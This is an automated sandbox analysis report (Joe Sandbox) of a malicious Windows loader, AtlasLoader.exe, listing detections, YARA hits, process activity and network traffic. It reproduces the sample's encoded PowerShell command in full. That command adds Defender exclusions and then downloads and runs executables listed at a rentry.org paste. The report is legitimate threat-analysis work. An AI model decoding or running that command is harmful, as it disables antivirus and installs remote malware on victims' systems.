Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AtlasLoader.exe

Overview

General Information

Sample Name:AtlasLoader.exe
Analysis ID:870964
MD5:85282b0e12f73dcb8c106a8e3dae2e50
SHA1:5f41ddb3bcd8260eda76452de9d3f0c4288528ea
SHA256:adcad18e1e03280010904fe1c5eb3defb5494d2c60073e74e8726f6902be43a0
Tags:exe
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Encrypted powershell cmdline option found
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Process Tree

  • System is w10x64
  • AtlasLoader.exe (PID: 5928 cmdline: C:\Users\user\Desktop\AtlasLoader.exe MD5: 85282B0E12F73DCB8C106A8E3DAE2E50)
    • powershell.exe (PID: 7128 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAdwBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB5AGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaAB2AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB2AGgAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHIAYwA1AHMAZQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAdQBlAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGwAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBiAHgAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAaABjAHYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBpAHMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAaABtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB2AGkAaQAjAD4A MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
AtlasLoader.exeSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth (Nextron Systems)
  • 0xb59:$xc3: 4A 41 42 70 41 44 30 41
  • 0xd21:$xc3: 4A 41 42 70 41 44 30 41

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.459911248.0000000006CF1000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth (Nextron Systems)
  • 0x1fd0:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000001.00000003.386518365.0000000006CF2000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth (Nextron Systems)
  • 0xc40:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
  • 0xfd0:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000000.00000002.359064192.00000000004D0000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth (Nextron Systems)
  • 0x460a:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000000.00000002.359014927.0000000000402000.00000002.00000001.01000000.00000003.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth (Nextron Systems)
  • 0x359:$xc3: 4A 41 42 70 41 44 30 41
  • 0x521:$xc3: 4A 41 42 70 41 44 30 41
00000000.00000000.358122619.0000000000402000.00000002.00000001.01000000.00000003.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth (Nextron Systems)
  • 0x359:$xc3: 4A 41 42 70 41 44 30 41
  • 0x521:$xc3: 4A 41 42 70 41 44 30 41
Click to see the 6 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
0.0.AtlasLoader.exe.400000.0.unpackSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth (Nextron Systems)
  • 0xb59:$xc3: 4A 41 42 70 41 44 30 41
  • 0xd21:$xc3: 4A 41 42 70 41 44 30 41
0.2.AtlasLoader.exe.400000.0.unpackSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth (Nextron Systems)
  • 0xb59:$xc3: 4A 41 42 70 41 44 30 41
  • 0xd21:$xc3: 4A 41 42 70 41 44 30 41

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: AtlasLoader.exeReversingLabs: Detection: 67%
Source: AtlasLoader.exeVirustotal: Detection: 74%Perma Link
Source: AtlasLoader.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknownHTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49699 version: TLS 1.0
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global trafficHTTP traffic detected: GET /rc5se/raw HTTP/1.1Host: rentry.orgConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 198.251.88.130 198.251.88.130
Source: unknownHTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49699 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 20 May 2023 12:31:56 GMTContent-Type: text/html; charset=utf-8Content-Length: 3151Connection: closeVary: Accept-EncodingX-XSS-Protection: 1; mode=blockCache-Control: Strict-Transport-Security: max-age=31536000; includeSubDomains
Source: powershell.exe, 00000001.00000003.461493971.0000000005168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000003.452864900.0000000006CF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/rc5se/raw
Source: unknownDNS traffic detected: queries for: rentry.org
Source: global trafficHTTP traffic detected: GET /rc5se/raw HTTP/1.1Host: rentry.orgConnection: Keep-Alive
Source: AtlasLoader.exe, 00000000.00000002.359103034.00000000006AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: AtlasLoader.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: AtlasLoader.exe, type: SAMPLEMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth (Nextron Systems), description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 0.0.AtlasLoader.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth (Nextron Systems), description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 0.2.AtlasLoader.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth (Nextron Systems), description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000001.00000003.459911248.0000000006CF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth (Nextron Systems), description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000001.00000003.386518365.0000000006CF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth (Nextron Systems), description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000000.00000002.359064192.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth (Nextron Systems), description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000000.00000002.359014927.0000000000402000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth (Nextron Systems), description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000000.00000000.358122619.0000000000402000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth (Nextron Systems), description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000001.00000003.452864900.0000000006CF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth (Nextron Systems), description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000001.00000003.386861743.0000000006CAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth (Nextron Systems), description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000000.00000002.359103034.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth (Nextron Systems), description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000000.00000002.359103034.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth (Nextron Systems), description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: Process Memory Space: AtlasLoader.exe PID: 5928, type: MEMORYSTRMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth (Nextron Systems), description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 7128, type: MEMORYSTRMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth (Nextron Systems), description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: AtlasLoader.exeReversingLabs: Detection: 67%
Source: AtlasLoader.exeVirustotal: Detection: 74%
Source: AtlasLoader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\AtlasLoader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\AtlasLoader.exe C:\Users\user\Desktop\AtlasLoader.exe
Source: C:\Users\user\Desktop\AtlasLoader.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAdwBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB5AGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaAB2AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB2AGgAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHIAYwA1AHMAZQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAdQBlAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGwAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBiAHgAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAaABjAHYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBpAHMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAaABtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB2AGkAaQAjAD4A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AtlasLoader.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAdwBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB5AGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaAB2AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB2AGgAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHIAYwA1AHMAZQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAdQBlAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGwAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBiAHgAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAaABjAHYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBpAHMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAaABtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB2AGkAaQAjAD4AJump to behavior
Source: C:\Users\user\Desktop\AtlasLoader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjv33pyp.sqx.ps1Jump to behavior
Source: classification engineClassification label: mal52.evad.winEXE@4/4@1/1
Source: C:\Users\user\Desktop\AtlasLoader.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Users\user\Desktop\AtlasLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
